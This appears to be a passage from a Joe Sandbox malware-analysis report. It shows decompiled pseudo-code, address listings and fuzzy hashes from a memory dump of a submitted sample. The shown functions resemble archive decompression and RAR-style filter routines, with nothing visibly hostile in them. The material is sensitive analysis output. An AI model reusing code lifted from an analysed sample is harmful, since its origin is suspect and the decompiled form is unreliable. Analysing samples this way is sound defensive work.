										 *(_t479 + 0x24) = ((_t264 & _t449 | 0x00000004) << _t379) + 2;
										__eflags = _t379;
										if(_t379 != 0) {
											_t305 = E00B6A89D(_t465);
											_t340 = _t325 +  *(_t479 + 0x30);
											_t422 = 0x10;
											 *(_t479 + 0x24) =  *(_t479 + 0x24) + (_t305 >> _t422 -  *(_t479 + 0x30));
											_t425 =  *(_t479 + 0x18) + (_t340 >> 3);
											_t325 = _t340 & 0x00000007;
											__eflags = _t325;
											 *(_t479 + 0x18) = _t425;
											 *_t465 = _t425;
											_t465[1] = _t325;
										}
									} else {
										 *(_t479 + 0x24) = _t264 + 2;
									}
									_t269 = E00B6A89D(_t465);
									_t270 =  *(_t466 + 0xfa0);
									_t451 = _t269 & 0x0000fffe;
									__eflags = _t451 -  *((intOrPtr*)(_t466 + 0xf20 + _t270 * 4));
									if(_t451 >=  *((intOrPtr*)(_t466 + 0xf20 + _t270 * 4))) {
										_t333 = 0xf;
										_t271 = _t270 + 1;
										__eflags = _t271 - _t333;
										if(_t271 >= _t333) {
											L49:
											_t382 = _t465[1] + _t333;
											_t383 = _t382 & 0x00000007;
											_t465[1] = _t383;
											 *_t465 =  *_t465 + (_t382 >> 3);
											_t274 =  *_t465;
											 *(_t479 + 0x18) = _t383;
											_t384 = 0x10;
											 *(_t479 + 0x28) = _t274;
											_t387 =  *((intOrPtr*)(_t466 + 0xf60 + _t333 * 4)) + (_t451 -  *((intOrPtr*)(_t466 + 0xf1c + _t333 * 4)) >> _t384 - _t333);
											__eflags = _t387 -  *((intOrPtr*)(_t466 + 0xf1c));
											asm("sbb eax, eax");
											_t275 = _t274 & _t387;
											__eflags = _t275;
											_t276 =  *(_t466 + 0x1ba4 + _t275 * 2) & 0x0000ffff;
											goto L50;
										}
										_t418 = _t466 + 0xf20 + _t271 * 4;
										while(1) {
											__eflags = _t451 -  *_t418;
											if(_t451 <  *_t418) {
												break;
											}
											_t271 = _t271 + 1;
											_t418 = _t418 + 4;
											__eflags = _t271 - 0xf;
											if(_t271 < 0xf) {
												continue;
											}
											goto L49;
										}
										_t333 = _t271;
										goto L49;
									} else {
										_t419 = 0x10;
										_t459 = _t451 >> _t419 - _t270;
										 *(_t479 + 0x30) = _t459;
										_t461 = ( *(_t459 + _t466 + 0xfa4) & 0x000000ff) + _t325;
										_t303 = (_t461 >> 3) +  *(_t479 + 0x18);
										_t462 = _t461 & 0x00000007;
										 *(_t479 + 0x28) = _t303;
										 *_t465 = _t303;
										_t465[1] = _t462;
										 *(_t479 + 0x18) = _t462;
										_t276 =  *(_t466 + 0x13a4 +  *(_t479 + 0x30) * 2) & 0x0000ffff;
										L50:
										_t277 = _t276 & 0x0000ffff;
										__eflags = _t277 - 4;
										if(_t277 >= 4) {
											_t473 = (_t277 >> 1) - 1;
											_t281 = ((_t277 & 0x00000001 | 0x00000002) << _t473) + 1;
											 *(_t479 + 0x30) = _t281;
											_t334 = _t281;
											__eflags = _t473;
											if(_t473 == 0) {
												L68:
												_t470 =  *(_t479 + 0x2c);
												L69:
												_t282 =  *(_t479 + 0x24);
												__eflags = _t334 - 0x100;
												if(_t334 > 0x100) {
													_t282 = _t282 + 1;
													__eflags = _t334 - 0x2000;
													if(_t334 > 0x2000) {
														_t282 = _t282 + 1;
														__eflags = _t334 - 0x40000;
														if(_t334 > 0x40000) {
															_t282 = _t282 + 1;
															__eflags = _t282;
														}
													}
												}
												 *_t470 = 1;
												_t470[1] = _t282;
												_t470[2] = _t334;
												goto L33;
											}
											__eflags = _t473 - 4;
											if(__eflags < 0) {
												_t283 = E00B78934(_t465);
												_t390 = 0x20;
												_t334 = (_t283 >> _t390 - _t473) +  *(_t479 + 0x30);
												_t393 =  *(_t479 + 0x18) + _t473;
												_t394 = _t393 & 0x00000007;
												__eflags = _t394;
												 *_t465 = (_t393 >> 3) +  *(_t479 + 0x28);
												_t465[1] = _t394;
												goto L68;
											}
											if(__eflags <= 0) {
												_t474 =  *(_t479 + 0x28);
											} else {
												_t298 = E00B78934(_t465);
												_t411 = 0x24;
												_t334 = (_t298 >> _t411 - _t473 << 4) +  *(_t479 + 0x30);
												_t415 =  *(_t479 + 0x18) + 0xfffffffc + _t473;
												_t474 =  *(_t479 + 0x28) + (_t415 >> 3);
												_t416 = _t415 & 0x00000007;
												 *_t465 = _t474;
												 *(_t479 + 0x18) = _t416;
												_t465[1] = _t416;
											}
											_t287 = E00B6A89D(_t465);
											_t288 =  *(_t466 + 0x1e8c);
											_t455 = _t287 & 0x0000fffe;
											__eflags = _t455 -  *((intOrPtr*)(_t466 + 0x1e0c + _t288 * 4));
											if(_t455 >=  *((intOrPtr*)(_t466 + 0x1e0c + _t288 * 4))) {
												_t475 = 0xf;
												_t289 = _t288 + 1;
												__eflags = _t289 - _t475;
												if(_t289 >= _t475) {
													L65:
													_t397 = _t465[1] + _t475;
													_t465[1] = _t397 & 0x00000007;
													_t291 = _t397 >> 3;
													 *_t465 =  *_t465 + _t291;
													_t399 = 0x10;
													_t402 =  *((intOrPtr*)(_t466 + 0x1e4c + _t475 * 4)) + (_t455 -  *((intOrPtr*)(_t466 + 0x1e08 + _t475 * 4)) >> _t399 - _t475);
													__eflags = _t402 -  *((intOrPtr*)(_t466 + 0x1e08));
													asm("sbb eax, eax");
													_t292 = _t291 & _t402;
													__eflags = _t292;
													_t293 =  *(_t466 + 0x2a90 + _t292 * 2) & 0x0000ffff;
													goto L66;
												}
												_t404 = _t466 + 0x1e0c + _t289 * 4;
												while(1) {
													__eflags = _t455 -  *_t404;
													if(_t455 <  *_t404) {
														break;
													}
													_t289 = _t289 + 1;
													_t404 = _t404 + 4;
													__eflags = _t289 - 0xf;
													if(_t289 < 0xf) {
														continue;
													}
													goto L65;
												}
												_t475 = _t289;
												goto L65;
											} else {
												_t405 = 0x10;
												_t458 = _t455 >> _t405 - _t288;
												_t408 = ( *(_t458 + _t466 + 0x1e90) & 0x000000ff) +  *(_t479 + 0x18);
												 *_t465 = (_t408 >> 3) + _t474;
												_t465[1] = _t408 & 0x00000007;
												_t293 =  *(_t466 + 0x2290 + _t458 * 2) & 0x0000ffff;
												L66:
												_t334 = _t334 + (_t293 & 0x0000ffff);
												goto L68;
											}
										}
										_t334 = _t277 + 1;
										goto L69;
									}
								}
								__eflags =  *(_t466 + 0x4ad8) - 1;
								if( *(_t466 + 0x4ad8) <= 1) {
									L35:
									 *_t470 =  *_t470 & 0x00000000;
									_t470[2] = _t353;
									_t470[1] = 0;
									goto L33;
								}
								__eflags =  *(_t470 - 0xc);
								if( *(_t470 - 0xc) != 0) {
									goto L35;
								}
								_t310 =  *(_t470 - 8) & 0x0000ffff;
								_t463 = 3;
								__eflags = _t310 - _t463;
								if(_t310 >= _t463) {
									goto L35;
								}
								_t311 = _t310 + 1;
								 *(_t470 - 8) = _t311;
								 *((_t311 & 0x0000ffff) + _t470 - 4) = _t353;
								_t72 = _t466 + 0x4ad8;
								 *_t72 =  *(_t466 + 0x4ad8) - 1;
								__eflags =  *_t72;
								goto L33;
							}
						}
					}
					L3:
					 *((char*)(_t466 + 0x4ad0)) = 1;
					return _t220;
				}
				 *((char*)(_t466 + 0x2c)) = 1;
				_push(_t466 + 0x30);
				_push(_t321);
				_push(_t465);
				_t220 = E00B743BF(__ecx);
				if(_t220 == 0) {
					goto L3;
				}
				goto L2;
			}

0x00b77158
0x00b7715d
0x00b77165
0x00b77168
0x00b7716b
0x00b77180
0x00b77183
0x00b77185
0x00b77189
0x00b771a1
0x00b771a8
0x00b771aa
0x00b771ad
0x00b771b1
0x00b771b6
0x00b771b8
0x00b771c2
0x00b771c4
0x00b771ba
0x00b771ba
0x00b771bc
0x00b771bc
0x00b771c8
0x00b771ce
0x00b771ce
0x00b771d0
0x00b771d4
0x00b771d6
0x00000000
0x00000000
0x00b771d8
0x00b771da
0x00b777b6
0x00000000
0x00b777b6
0x00b771e0
0x00b771ee
0x00b771ee
0x00b771f0
0x00b771ff
0x00b771ff
0x00b77205
0x00b77207
0x00b7720b
0x00b77211
0x00b777af
0x00b777af
0x00000000
0x00b777af
0x00000000
0x00b77211
0x00b771f2
0x00b771f9
0x00000000
0x00000000
0x00000000
0x00b771f9
0x00b771e2
0x00b771e5
0x00b771e8
0x00000000
0x00000000
0x00000000
0x00b77217
0x00b77217
0x00b77220
0x00b77226
0x00b77228
0x00b7722b
0x00b77234
0x00b77235
0x00b7723c
0x00b77240
0x00b77242
0x00b77249
0x00b77249
0x00b7724e
0x00b7724e
0x00b77250
0x00b7725b
0x00b7725e
0x00b77262
0x00b77268
0x00b7726f
0x00b77275
0x00b7727b
0x00b7727f
0x00b772b2
0x00b772b3
0x00b772b4
0x00b772b8
0x00b772ba
0x00b772db
0x00b772de
0x00b772e2
0x00b772e8
0x00b772ec
0x00b772f0
0x00b772f4
0x00b772f9
0x00b77306
0x00b77308
0x00b7730b
0x00b7730d
0x00b7730d
0x00b7730f
0x00000000
0x00b7730f
0x00b772bf
0x00b772c2
0x00b772c2
0x00b772c4
0x00000000
0x00000000
0x00b772c6
0x00b772c7
0x00b772ca
0x00b772cd
0x00000000
0x00000000
0x00b772cf
0x00000000
0x00b772cf
0x00b772d5
0x00b772d7
0x00000000
0x00b77281
0x00b77283
0x00b77286
0x00b77290
0x00b77298
0x00b7729a
0x00b7729f
0x00b772a3
0x00b772a6
0x00b77317
0x00b77317
0x00b7731f
0x00b77321
0x00b77374
0x00b7737a
0x00b77630
0x00b77632
0x00b77686
0x00b7768c
0x00b7769c
0x00b7769d
0x00b776a8
0x00b776ab
0x00b776b2
0x00b776b8
0x00b776be
0x00b776c5
0x00b776f6
0x00b776f7
0x00b776f8
0x00b776fa
0x00b77716
0x00b77719
0x00b7771d
0x00b77720
0x00b77723
0x00b77726
0x00b7772f
0x00b77735
0x00b77741
0x00b77743
0x00b77749
0x00b7774b
0x00b7774b
0x00b7774d
0x00b77755
0x00b77755
0x00b77758
0x00b7775b
0x00b77769
0x00b7776c
0x00b77774
0x00b77777
0x00b7777b
0x00b7777d
0x00b77781
0x00b7778c
0x00b77795
0x00b77797
0x00b7779e
0x00b777a0
0x00b777a0
0x00b777a3
0x00b777a3
0x00b7775d
0x00b7775d
0x00b7775d
0x00b777a6
0x00b77350
0x00b77350
0x00b77354
0x00b77354
0x00b77358
0x00b7735c
0x00000000
0x00b7735c
0x00b77702
0x00b77705
0x00b77705
0x00b77707
0x00000000
0x00000000
0x00b77709
0x00b7770a
0x00b7770d
0x00b77710
0x00000000
0x00000000
0x00000000
0x00b77712
0x00b77714
0x00000000
0x00b77714
0x00b776c9
0x00b776cc
0x00b776d6
0x00b776de
0x00b776e0
0x00b776e3
0x00b776e6
0x00b776ee
0x00000000
0x00b776ee
0x00b7768e
0x00000000
0x00b7768e
0x00b7763c
0x00b7763e
0x00b77648
0x00b7764c
0x00b77654
0x00b77659
0x00b7765a
0x00b7765d
0x00b77666
0x00b77669
0x00b77674
0x00b7767c
0x00b7767e
0x00000000
0x00b7767e
0x00b77380
0x00b77386
0x00b77389
0x00b773a0
0x00b773a6
0x00b773af
0x00b773b3
0x00b773b7
0x00b773b9
0x00b773bd
0x00b773c2
0x00b773c8
0x00b773cf
0x00b773dc
0x00b773de
0x00b773de
0x00b773e1
0x00b773e5
0x00b773e7
0x00b773e7
0x00b7738b
0x00b77396
0x00b77396
0x00b773ec
0x00b773f3
0x00b773f9
0x00b773ff
0x00b77406
0x00b77446
0x00b77447
0x00b77448
0x00b7744a
0x00b77466
0x00b77469
0x00b7746d
0x00b77470
0x00b77476
0x00b7747f
0x00b77481
0x00b77487
0x00b7748a
0x00b77497
0x00b77499
0x00b7749f
0x00b774a1
0x00b774a1
0x00b774a3
0x00000000
0x00b774a3
0x00b77452
0x00b77455
0x00b77455
0x00b77457
0x00000000
0x00000000
0x00b77459
0x00b7745a
0x00b7745d
0x00b77460
0x00000000
0x00000000
0x00000000
0x00b77462
0x00b77464
0x00000000
0x00b77408
0x00b7740a
0x00b7740d
0x00b7740f
0x00b7741b
0x00b77422
0x00b77426
0x00b77429
0x00b7742d
0x00b77433
0x00b77436
0x00b7743a
0x00b774ab
0x00b774ab
0x00b774ae
0x00b774b1
0x00b774c5
0x00b774ca
0x00b774cb
0x00b774cf
0x00b774d1
0x00b774d3
0x00b775fa
0x00b775fa
0x00b775fe
0x00b775fe
0x00b77602
0x00b77608
0x00b7760a
0x00b7760b
0x00b77611
0x00b77613
0x00b77614
0x00b7761a
0x00b7761c
0x00b7761c
0x00b7761c
0x00b7761a
0x00b77611
0x00b7761d
0x00b77624
0x00b77628
0x00000000
0x00b77628
0x00b774d9
0x00b774dc
0x00b775d1
0x00b775da
0x00b775e3
0x00b775e7
0x00b775f2
0x00b775f2
0x00b775f5
0x00b775f7
0x00000000
0x00b775f7
0x00b774e2
0x00b7751d
0x00b774e4
0x00b774e6
0x00b774ef
0x00b774fe
0x00b77502
0x00b7750d
0x00b7750f
0x00b77512
0x00b77514
0x00b77518
0x00b77518
0x00b77523
0x00b7752a
0x00b77530
0x00b77536
0x00b7753d
0x00b7756d
0x00b7756e
0x00b7756f
0x00b77571
0x00b7758d
0x00b77590
0x00b77597
0x00b7759a
0x00b7759d
0x00b775a8
0x00b775b4
0x00b775b6
0x00b775bc
0x00b775be
0x00b775be
0x00b775c0
0x00000000
0x00b775c0
0x00b77579
0x00b7757c
0x00b7757c
0x00b7757e
0x00000000
0x00000000
0x00b77580
0x00b77581
0x00b77584
0x00b77587
0x00000000
0x00000000
0x00000000
0x00b77589
0x00b7758b
0x00000000
0x00b7753f
0x00b77541
0x00b77544
0x00b7754e
0x00b7755c
0x00b7755e
0x00b77561
0x00b775c8
0x00b775cb
0x00000000
0x00b775cb
0x00b7753d
0x00b774b3
0x00000000
0x00b774b3
0x00b77406
0x00b77323
0x00b7732a
0x00b77365
0x00b77365
0x00b7736b
0x00b7736e
0x00000000
0x00b7736e
0x00b7732c
0x00b77330
0x00000000
0x00000000
0x00b77332
0x00b77338
0x00b77339
0x00b7733c
0x00000000
0x00000000
0x00b7733e
0x00b7733f
0x00b77346
0x00b7734a
0x00b7734a
0x00b7734a
0x00000000
0x00b7734a
0x00b7727f
0x00b771ce
0x00b7718b
0x00b7718b
0x00000000
0x00b7718b
0x00b77170
0x00b77174
0x00b77175
0x00b77176
0x00b77177
0x00b7717e
0x00000000
0x00000000
0x00000000

Memory Dump Source

Source File: 00000000.00000002.268617007.0000000000B61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B60000, based on PE: true

Associated: 00000000.00000002.268588954.0000000000B60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.269911240.0000000000B93000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.270239864.0000000000B9E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.270239864.0000000000BA5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.270239864.0000000000BC2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.270395727.0000000000BC3000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b60000_1JCAVkYU3U.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 354bb1393c8098f6bbe5d701d2874da834517f5721d4717deeb7f3b1d92ca544
Instruction ID: e9c58e79a8594461054b6a26b9ef6add70599dae1c261bb71ee6a0b51ff61e33
Opcode Fuzzy Hash: 354bb1393c8098f6bbe5d701d2874da834517f5721d4717deeb7f3b1d92ca544
Instruction Fuzzy Hash: 1412C1B16587069FC718CF28C4D0A79B7E0FB94304F10896EE9AAC7781EB34E995CB45

Uniqueness

Uniqueness Score: -1.00%

Function 00B6C426 Relevance: .5, Instructions: 454
COMMONCrypto

Download Yara Rule

C-Code - Quality: 100%

			E00B6C426(signed char** __ecx) {
				void* __edi;
				void* _t188;
				signed int _t189;
				char _t192;
				void* _t197;
				void* _t198;
				signed int _t201;
				signed char _t202;
				void* _t212;
				signed int _t213;
				signed int _t215;
				signed int _t216;
				signed char* _t217;
				void* _t218;
				intOrPtr _t222;
				signed char* _t225;
				signed char _t228;
				void* _t237;
				void* _t238;
				signed int _t239;
				signed int _t242;
				signed char* _t245;
				signed int _t277;
				void* _t278;
				void* _t279;
				void* _t280;
				void* _t281;
				void* _t282;
				signed int _t286;
				intOrPtr _t287;
				void* _t288;
				signed char* _t289;
				void* _t290;
				signed int _t291;
				signed int _t292;
				char _t293;
				intOrPtr* _t295;
				signed char _t296;
				signed int _t301;
				signed int _t302;
				intOrPtr _t304;
				intOrPtr* _t306;
				signed char* _t307;
				signed int _t308;
				signed int _t314;
				signed int _t316;
				signed int _t318;
				signed int _t319;
				signed char _t320;
				intOrPtr _t321;
				intOrPtr _t322;
				unsigned int _t325;
				signed int _t326;
				signed int _t327;
				signed int _t328;
				void* _t331;
				signed char _t332;
				signed char* _t333;
				signed char _t335;
				signed int _t336;
				signed int _t337;
				void* _t338;
				void* _t339;
				void* _t340;
				signed int _t343;
				signed int _t344;
				signed char* _t345;
				signed int _t346;
				signed int _t348;
				intOrPtr _t350;
				signed int _t351;
				signed int _t354;
				void* _t358;
				signed int _t359;
				signed char* _t360;
				signed int _t361;
				void* _t362;
				void* _t363;

				_t349 = __ecx;
				_t188 =  *((intOrPtr*)(_t363 + 4)) - 1;
				if(_t188 == 0) {
					L84:
					_t189 =  *(_t349 + 0x14);
					_t295 =  *_t349;
					_t350 =  *((intOrPtr*)(_t349 + 0x1c));
					_t288 = _t189 - 4;
					if(_t288 > 0x3fffc) {
						L96:
						return 0;
					}
					_t338 = 0;
					_t192 = (_t189 & 0xffffff00 |  *((intOrPtr*)(_t363 + 0x64)) == 0x00000002) + 0xe8;
					 *((char*)(_t363 + 0x13)) = _t192;
					if(_t288 == 0) {
						L95:
						return 1;
					} else {
						goto L86;
					}
					do {
						L86:
						_t321 =  *_t295;
						_t295 = _t295 + 1;
						_t339 = _t338 + 1;
						_t350 = _t350 + 1;
						if(_t321 == 0xe8 || _t321 == _t192) {
							_t322 =  *_t295;
							if(_t322 >= 0) {
								if(_t322 - 0x1000000 < 0) {
									 *_t295 = _t322 - _t350;
								}
							} else {
								if(_t350 + _t322 >= 0) {
									 *_t295 = _t322 + 0x1000000;
								}
							}
							_t192 =  *((intOrPtr*)(_t363 + 0x13));
							_t295 = _t295 + 4;
							_t338 = _t339 + 4;
							_t350 = _t350 + 4;
						}
					} while (_t338 < _t288);
					goto L95;
				}
				_t197 = _t188 - 1;
				if(_t197 == 0) {
					goto L84;
				}
				_t198 = _t197 - 1;
				if(_t198 == 0) {
					_t289 =  *__ecx;
					_t340 = __ecx[5] - 0x15;
					if(_t340 > 0x3ffeb) {
						goto L96;
					}
					_t325 = __ecx[7] >> 4;
					 *(_t363 + 0x28) = _t325;
					if(_t340 == 0) {
						goto L95;
					}
					_t343 = (_t340 - 1 >> 4) + 1;
					 *(_t363 + 0x38) = _t343;
					do {
						_t201 =  *_t289 & 0x1f;
						if(_t201 < 0x10) {
							goto L82;
						}
						_t202 =  *((intOrPtr*)(_t201 + 0xb9e078));
						if(_t202 == 0) {
							goto L82;
						}
						_t344 =  *(_t363 + 0x28);
						_t296 = 0;
						_t326 = _t202 & 0x000000ff;
						 *(_t363 + 0x30) = 0;
						 *(_t363 + 0x40) = _t326;
						_t358 = 0x12;
						do {
							if((_t326 & 1) != 0) {
								_t168 = _t358 + 0x18; // 0x2a
								if(E00B6C985(_t289, _t168, 4) == 5) {
									E00B6C9D0(_t289, E00B6C985(_t289, _t358, 0x14) - _t344 & 0x000fffff, _t358, 0x14);
								}
								_t326 =  *(_t363 + 0x3c);
								_t296 =  *(_t363 + 0x2c);
							}
							_t296 = _t296 + 1;
							_t358 = _t358 + 0x29;
							 *(_t363 + 0x2c) = _t296;
						} while (_t358 <= 0x64);
						_t343 =  *(_t363 + 0x38);
						_t325 =  *(_t363 + 0x28);
						L82:
						_t289 =  &(_t289[0x10]);
						_t325 = _t325 + 1;
						_t343 = _t343 - 1;
						 *(_t363 + 0x28) = _t325;
						 *(_t363 + 0x38) = _t343;
					} while (_t343 != 0);
					goto L95;
				}
				_t212 = _t198 - 1;
				if(_t212 == 0) {
					_t213 = __ecx[1];
					_t345 = __ecx[5];
					 *(_t363 + 0x18) = _t213;
					_t290 = _t213 - 3;
					if(_t345 - 3 > 0x1fffd || _t290 > _t345) {
						goto L96;
					} else {
						_t215 = __ecx[2];
						 *(_t363 + 0x20) = _t215;
						if(_t215 > 2) {
							goto L96;
						}
						_t216 =  *__ecx;
						 *(_t363 + 0x14) = _t216;
						_t359 = 3;
						_t351 =  &(_t345[_t216]);
						_t217 = 0;
						 *(_t363 + 0x24) = _t351;
						_t301 = _t351 - _t290;
						 *(_t363 + 0x30) = 0;
						 *(_t363 + 0x28) = _t301;
						do {
							_t291 = 0;
							if(_t217 >= _t345) {
								goto L65;
							}
							_t327 =  *(_t363 + 0x18);
							_t360 =  &(_t217[_t301]);
							_t302 =  *(_t363 + 0x14);
							_t225 =  *(_t363 + 0x18) + 0xfffffffd - _t351;
							 *(_t363 + 0x34) = _t225;
							do {
								if( &(_t225[_t360]) >= _t327) {
									 *(_t363 + 0x3c) =  *_t360 & 0x000000ff;
									 *(_t363 + 0x3c) =  *(_t360 - 3) & 0x000000ff;
									 *(_t363 + 0x44) = E00B8614A(_t327, ( *_t360 & 0x000000ff) - ( *(_t360 - 3) & 0x000000ff));
									 *(_t363 + 0x38) = E00B8614A(_t327, ( *_t360 & 0x000000ff) - ( *(_t360 - 3) & 0x000000ff) + _t291 -  *(_t363 + 0x40));
									_t237 = E00B8614A(_t327, ( *_t360 & 0x000000ff) - ( *(_t360 - 3) & 0x000000ff) + _t291 -  *(_t363 + 0x40));
									_t304 =  *((intOrPtr*)(_t363 + 0x4c));
									_t363 = _t363 + 0xc;
									_t332 =  *(_t363 + 0x2c);
									if(_t304 > _t332 || _t304 > _t237) {
										_t302 =  *(_t363 + 0x14);
										_t327 =  *(_t363 + 0x18);
										_t291 =  *(_t363 + 0x3c);
										if(_t332 > _t237) {
											_t291 =  *(_t363 + 0x38);
										}
									} else {
										_t302 =  *(_t363 + 0x14);
										_t327 =  *(_t363 + 0x18);
									}
								}
								_t228 = _t291 -  *_t302;
								_t302 = _t302 + 1;
								(_t360 - 3)[_t327] = _t228;
								_t360 =  &(_t360[3]);
								_t291 = _t228 & 0x000000ff;
								 *(_t363 + 0x14) = _t302;
								_t225 =  *(_t363 + 0x34);
							} while ( &(( *(_t363 + 0x34))[_t360]) < _t345);
							_t217 =  *(_t363 + 0x30);
							_t301 =  *(_t363 + 0x28);
							_t351 =  *(_t363 + 0x24);
							_t359 = 3;
							L65:
							_t217 =  &(_t217[1]);
							 *(_t363 + 0x30) = _t217;
						} while (_t217 < _t359);
						_t328 =  *(_t363 + 0x20);
						_t218 = _t345 - 2;
						if(_t328 >= _t218) {
							goto L95;
						}
						_t306 = _t328 + 2 + _t351;
						_t331 = (_t218 - _t328 - 1) / _t359 + 1;
						do {
							_t222 =  *((intOrPtr*)(_t306 - 1));
							 *((intOrPtr*)(_t306 - 2)) =  *((intOrPtr*)(_t306 - 2)) + _t222;
							 *_t306 =  *_t306 + _t222;
							_t306 = _t306 + _t359;
							_t331 = _t331 - 1;
						} while (_t331 != 0);
						goto L95;
					}
				}
				_t238 = _t212 - 1;
				if(_t238 == 0) {
					_t307 = __ecx[5];
					_t333 =  *__ecx;
					_t239 = __ecx[1];
					 *(_t363 + 0x30) = _t333;
					 *(_t363 + 0x34) = _t307;
					 *(_t363 + 0x38) = _t239;
					 *(_t363 + 0x40) =  &(_t333[_t307]);
					if(_t307 > 0x20000 || _t239 > 0x80 || _t239 == 0) {
						goto L96;
					} else {
						_t346 = 0;
						 *(_t363 + 0x3c) = 0;
						if(_t239 == 0) {
							goto L95;
						} else {
							goto L20;
						}
						do {
							L20:
							 *(_t363 + 0x24) =  *(_t363 + 0x24) & 0x00000000;
							 *(_t363 + 0x20) =  *(_t363 + 0x20) & 0x00000000;
							_t354 = 0;
							 *(_t363 + 0x1c) =  *(_t363 + 0x1c) & 0x00000000;
							_t292 = 0;
							 *(_t363 + 0x18) =  *(_t363 + 0x18) & 0x00000000;
							_t361 = 0;
							 *(_t363 + 0x20) = 0;
							E00B7FFF0(_t346, _t363 + 0x44, 0, 0x1c);
							 *(_t363 + 0x38) =  *(_t363 + 0x38) & 0;
							_t363 = _t363 + 0xc;
							 *(_t363 + 0x28) = _t346;
							if(_t346 >=  *(_t363 + 0x34)) {
								_t242 =  *(_t363 + 0x38);
								goto L49;
							} else {
								goto L21;
							}
							do {
								L21:
								_t308 =  *(_t363 + 0x20);
								 *(_t363 + 0x18) = _t308 -  *(_t363 + 0x1c);
								_t245 =  *(_t363 + 0x30);
								 *(_t363 + 0x1c) = _t308;
								_t335 =  *_t245;
								 *(_t363 + 0x30) =  &(_t245[1]);
								_t314 = ( *(_t363 + 0x18) * _t354 + _t361 *  *(_t363 + 0x18) + _t292 *  *(_t363 + 0x20) +  *(_t363 + 0x24) * 0x00000008 >> 0x00000003 & 0x000000ff) - (_t335 & 0x000000ff);
								 *( *(_t363 + 0x28) +  *(_t363 + 0x40)) = _t314;
								_t357 = _t335 << 3;
								 *(_t363 + 0x24) = _t314 -  *(_t363 + 0x24);
								 *(_t363 + 0x28) = _t314;
								 *((intOrPtr*)(_t363 + 0x48)) =  *((intOrPtr*)(_t363 + 0x48)) + E00B8614A(_t335, _t335 << 3);
								 *((intOrPtr*)(_t363 + 0x50)) =  *((intOrPtr*)(_t363 + 0x50)) + E00B8614A(_t335, (_t335 << 3) -  *(_t363 + 0x20));
								 *((intOrPtr*)(_t363 + 0x58)) =  *((intOrPtr*)(_t363 + 0x58)) + E00B8614A(_t335,  *(_t363 + 0x24) + (_t335 << 3));
								 *((intOrPtr*)(_t363 + 0x60)) =  *((intOrPtr*)(_t363 + 0x60)) + E00B8614A(_t335, (_t335 << 3) -  *(_t363 + 0x24));
								 *((intOrPtr*)(_t363 + 0x68)) =  *((intOrPtr*)(_t363 + 0x68)) + E00B8614A(_t335,  *(_t363 + 0x28) + (_t335 << 3));
								 *((intOrPtr*)(_t363 + 0x70)) =  *((intOrPtr*)(_t363 + 0x70)) + E00B8614A(_t335, _t357 -  *(_t363 + 0x18));
								 *((intOrPtr*)(_t363 + 0x78)) =  *((intOrPtr*)(_t363 + 0x78)) + E00B8614A(_t335, _t357 +  *(_t363 + 0x18));
								_t363 = _t363 + 0x1c;
								if(( *(_t363 + 0x2c) & 0x0000001f) != 0) {
									_t354 =  *(_t363 + 0x14);
								} else {
									_t336 =  *(_t363 + 0x44);
									_t277 = 0;
									 *(_t363 + 0x44) =  *(_t363 + 0x44) & 0;
									_t318 = 1;
									do {
										if( *(_t363 + 0x44 + _t318 * 4) < _t336) {
											_t336 =  *(_t363 + 0x44 + _t318 * 4);
											_t277 = _t318;
										}
										 *(_t363 + 0x44 + _t318 * 4) =  *(_t363 + 0x44 + _t318 * 4) & 0x00000000;
										_t318 = _t318 + 1;
									} while (_t318 < 7);
									_t354 =  *(_t363 + 0x14);
									_t278 = _t277 - 1;
									if(_t278 == 0) {
										if(_t292 >= 0xfffffff0) {
											_t292 = _t292 - 1;
										}
										goto L46;
									}
									_t279 = _t278 - 1;
									if(_t279 == 0) {
										if(_t292 < 0x10) {
											_t292 = _t292 + 1;
										}
										goto L46;
									}
									_t280 = _t279 - 1;
									if(_t280 == 0) {
										if(_t361 >= 0xfffffff0) {
											_t361 = _t361 - 1;
										}
										goto L46;
									}
									_t281 = _t280 - 1;
									if(_t281 == 0) {
										if(_t361 < 0x10) {
											_t361 = _t361 + 1;
										}
										goto L46;
									}
									_t282 = _t281 - 1;
									if(_t282 == 0) {
										if(_t354 < 0xfffffff0) {
											goto L46;
										}
										_t354 = _t354 - 1;
										L34:
										 *(_t363 + 0x14) = _t354;
										goto L46;
									}
									if(_t282 != 1 || _t354 >= 0x10) {
										goto L46;
									} else {
										_t354 = _t354 + 1;
										goto L34;
									}
								}
								L46:
								_t242 =  *(_t363 + 0x38);
								_t316 =  *(_t363 + 0x28) + _t242;
								 *(_t363 + 0x2c) =  *(_t363 + 0x2c) + 1;
								 *(_t363 + 0x28) = _t316;
							} while (_t316 <  *(_t363 + 0x34));
							_t346 =  *(_t363 + 0x3c);
							L49:
							_t346 = _t346 + 1;
							 *(_t363 + 0x3c) = _t346;
						} while (_t346 < _t242);
						goto L95;
					}
				}
				if(_t238 != 1) {
					goto L95;
				}
				_t319 = __ecx[5];
				_t362 = 0;
				_t337 = __ecx[1];
				 *(_t363 + 0x28) = _t319;
				 *(_t363 + 0x2c) = _t319 + _t319;
				if(_t319 > 0x20000 || _t337 > 0x400 || _t337 == 0) {
					goto L96;
				} else {
					_t286 = _t337;
					 *(_t363 + 0x24) = _t337;
					do {
						_t293 = 0;
						_t348 = _t319;
						if(_t319 <  *(_t363 + 0x2c)) {
							_t320 =  *(_t363 + 0x2c);
							goto L12;
							L12:
							_t287 =  *_t349;
							_t293 = _t293 -  *((intOrPtr*)(_t287 + _t362));
							_t362 = _t362 + 1;
							 *((char*)(_t287 + _t348)) = _t293;
							_t348 = _t348 + _t337;
							if(_t348 < _t320) {
								goto L12;
							} else {
								_t319 =  *(_t363 + 0x28);
								_t286 =  *(_t363 + 0x24);
								goto L14;
							}
						}
						L14:
						_t319 = _t319 + 1;
						_t286 = _t286 - 1;
						 *(_t363 + 0x28) = _t319;
						 *(_t363 + 0x24) = _t286;
					} while (_t286 != 0);
					goto L95;
				}
			}

0x00b6c430
0x00b6c433
0x00b6c436
0x00b6c90a
0x00b6c90a
0x00b6c90d
0x00b6c90f
